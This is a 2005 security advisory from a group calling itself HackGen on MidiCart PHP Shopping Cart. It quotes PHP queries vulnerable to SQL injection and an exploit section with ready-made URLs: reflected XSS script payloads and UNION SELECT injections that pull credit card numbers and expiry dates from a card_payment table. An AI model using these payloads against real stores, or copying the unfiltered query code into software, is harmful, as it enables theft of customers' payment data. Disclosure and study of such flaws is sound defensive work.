MidiCat PHP Shopping Cart suffers from multiple cross site scripting, SQL injection, and other security bugs.
cfcaf4f2b96fe2bd8e82fdc6f46ae6caa96a374e250b09add3e5cb9c59f6329a
http://www.hackgen.org/advisories/hackgen-2005-004.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2005-#004] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Multiple bugs in MidiCart PHP Shopping Cart '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Software: MidiCart PHP Shopping Cart
Homepage: http://www.midicart.com/
Author: "Exoduks" - HackGen Team
Release Date: 5 May, 2005
Website: www.hackgen.org
Mail: exoduks [at] gmail . com
0x01 - Affected software description:
-------------------------------------
MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you need to
create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP Shopping
Cart is extremely easy to use, flexible, powerful and affordable e-commerce solution for
your web site.
0x02 - Vulnerability Discription:
---------------------------------
There are several vulnarabilities in midicart. First there are some full-path disclosure
bugs because of some undefined variable and if php.ini is set to display_errors = on we
will see full path of the script. Second vulnerability is xss in item_list.php and
search_list.php file which doesn't have any checking of input string so it is possible to
inject some evil code and execute through the browser. Third bug is a sql injection also
in search_list.php, item_list.php and item_show.php file also because there isn't any
filtering and checking of input string which will be executed in mysql command so with
special crafted sql command we can get some sensitve information from database.
0x03 - Vulnerability Code:
--------------------------
Code vulnarable to sql injectio in search_list.php file
...
// database query to select the categories
$result = mysql_query("select * from products WHERE $chose LIKE '%$searchstring%' ORDER BY
'maingroup','secondgroup','code_no' LIMIT 0, 100 ") ;
...
Code vulnarable to sql injectio in item_show.php file
// query to get the products of type $category
$result = mysql_query("select * from products where(code_no = '$code_no') ORDER BY 'item'");
0x04 - How to fix this bug:
---------------------------
Vendor has beed contacted and he we probably publish new version of this shopping cart so go to
http://www.midicart.com/ and look for new version.
0x05 - Exploit:
----------------
Full-path disclosure !
-----------------------
http://site.com/shop/search_list.php
http://site.com/shop/item_list.php
http://site.com/shop/item_show.php
XSS !
------
http://site.com/shop/search_list.php?chose=item&searchstring=%3Cscri pt%3Ealert('Lamed%20!');%3C/script%3E
http://site.com/shop/item_list.php?secondgroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
http://site.com/shop/item_list.php?maingroup=%3Cscript%3Ealert('Lamed%20!');%3C/script%3E
SQL injection !
----------------
http://site.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard,
ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,
null, null, null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null,
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,
null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null,
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,
null, null, null, null, null, null FROM card_payment /*
http://site.com/shop/item_show.php?code_no=99 ') UNION SELECT null, null, CreditCard, ExpDate,null,
null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,
null, null, null, null, null, null FROM card_payment /*
* works with magic_quotes_gpc set to Off in php.ini file
0x006 - The End:
----------------
And we are at the end again. Grejtttzz to blackhat.headcoders.net
______________________________________
Written By Exoduks - www.hackgen.org